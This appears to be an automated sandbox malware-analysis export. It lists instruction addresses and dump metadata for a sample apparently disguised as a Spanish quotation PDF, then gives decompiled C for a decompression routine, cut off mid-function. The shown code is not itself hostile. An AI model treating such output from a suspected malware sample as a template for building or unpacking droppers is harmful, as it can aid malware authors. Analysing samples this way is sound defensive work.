0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b4
0x004067b8
0x00000000
0x00000000
0x004067ba
0x004067c3
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b8
0x00000000
0x00000000
0x00000000
0x00406813
0x00406813
0x0040678c
0x00406790
0x004068c8
0x004068c8
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406796
0x0040679c
0x004067a3
0x004067ab
0x004067ab
0x004067ae
0x00000000
0x004067ae
0x00406818
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef0
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x0040683b
0x00000000
0x0040683b
0x00405f95
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x0040684a
0x00000000
0x0040684a
0x00406005
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068bc
0x00000000
0x004068bc
0x00406713
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00000000
0x0040604c
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062eb
0x004062ef
0x0040630d
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406414
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406682
0x00406686
0x004066a8
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00406745
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406830
0x00406833
0x00406734
0x00406734
0x00406734
0x00000000
0x0040673a
0x00000000
0x0040646a
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x0040678a
0x00000000
0x00000000
0x00000000
0x004064af
0x004064af
0x004064b2
0x004064e8
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x00406548
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067b4
0x0040677d

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
